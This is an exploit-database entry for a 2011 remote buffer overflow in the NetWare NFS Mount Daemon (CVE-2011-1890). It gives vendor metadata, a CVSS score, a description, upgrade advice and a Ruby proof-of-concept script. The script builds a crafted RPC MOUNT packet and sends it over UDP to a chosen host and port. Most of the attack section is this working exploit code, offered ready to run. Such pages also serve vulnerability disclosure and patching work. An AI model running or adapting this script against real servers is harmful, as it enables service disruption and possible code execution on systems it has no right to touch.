header-logo
Suggest Exploit
vendor:
NetWare
by:
Protek Research Lab
7.5
CVSS
HIGH
NetWare NFS Mount Daemon Remote Buffer Overflow
119
CWE
Product Name: NetWare
Affected Version From: NetWare prior to 6.5 SP8
Affected Version To: NetWare prior to 6.5 SP8
Patch Exists: YES
Related CWE: CVE-2011-1890
CPE: o:novell:netware
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=56177https://www.infosecmatter.com/nessus-plugin-library/?id=66989https://www.infosecmatter.com/nessus-plugin-library/?id=66993https://www.infosecmatter.com/nessus-plugin-library/?id=66991https://www.infosecmatter.com/nessus-plugin-library/?id=66994https://www.infosecmatter.com/nessus-plugin-library/?_page=67
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

PRL-2011-04

This exploit is a remote buffer overflow vulnerability in the NetWare NFS Mount Daemon. It allows an attacker to send a specially crafted packet to the target port, which can be used to execute arbitrary code on the target system. The vulnerability was discovered by Protek Research Lab in 2011 and affects versions of NetWare prior to 6.5 SP8.

Mitigation:

Upgrade to the latest version of NetWare 6.5 SP8 or later.
Source

Exploit-DB raw data:

#!/usr/bin/ruby

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24

require 'socket'

netware_server = (ARGV[0])
target_port = (ARGV[1] || 1234)


beepbeep=
"\x1c\xd1\xef\xab"  + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa5" + # Program: 10005 MOUNT
"\x00\x00\x00\x02" + # Program Version: 2
"\x00\x00\x00\x01" + # Procedure: MNT  (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" + #
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Verifier NULL
"\x41\x42\x43\x44"




puts "[+] beep beep\n"
puts "[+]No, it's not the road runner\n"


if (!(netware_server && target_port))
    puts "Usage: PRL-2011-04.rb host port (default port: 1234)\n"
    exit
else
    puts "[+]Sending UDP Packet...\n"
    sock = UDPSocket.open
    sock.connect(netware_server, target_port.to_i)
    sock.send(beepbeep, 0)
end

Navigation

Suggest Exploit

Services By CQR